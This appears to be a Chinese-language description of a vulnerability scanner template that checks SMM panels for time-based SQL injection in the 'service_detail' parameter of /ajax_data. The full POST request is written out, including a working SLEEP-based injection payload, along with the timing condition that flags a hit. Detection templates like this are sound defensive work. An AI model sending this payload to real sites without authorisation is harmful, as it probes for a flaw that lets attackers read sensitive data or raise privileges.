基于时间的SMM面板SQL注入检测
该模板通过 HTTP POST 请求向 /ajax_data 发送数据,检测 SMM 面板中 service_detail 参数是否存在基于时间的 SQL 注入漏洞。利用该漏洞,远程攻击者可以访问敏感数据或提升权限。
该工具发送一个构造的 POST 请求:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
如果响应时间大于 5 秒,则表示存在易受攻击的端点。
- 方法:POST
- 路径:{{BaseURL}}/ajax_data
- 请求头:Content-Type: application/x-www-form-urlencoded
- 请求体:action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- 匹配条件:duration > 5 秒
